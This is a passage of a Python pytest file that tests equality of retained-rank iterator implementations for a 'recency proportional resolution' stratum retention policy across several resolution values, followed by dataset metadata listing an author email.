and 0 <= r < num_strata_deposited
for r in which(policy, num_strata_deposited)
)
@pytest.mark.parametrize(
"impl",
recency_proportional_resolution_algo._scry._IterRetainedRanks_.impls,
)
@pytest.mark.parametrize(
"recency_proportional_resolution",
[
0,
1,
2,
3,
7,
42,
97,
100,
],
)
def test_eq(impl, recency_proportional_resolution):
policy = recency_proportional_resolution_algo.Policy(
recency_proportional_resolution
)
spec = policy.GetSpec()
instance = impl(spec)
assert instance == instance
assert instance == impl(spec)
assert instance is not None
| [
"mmore500.login+gpg@gmail.com"
] | mmore500.login+gpg@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.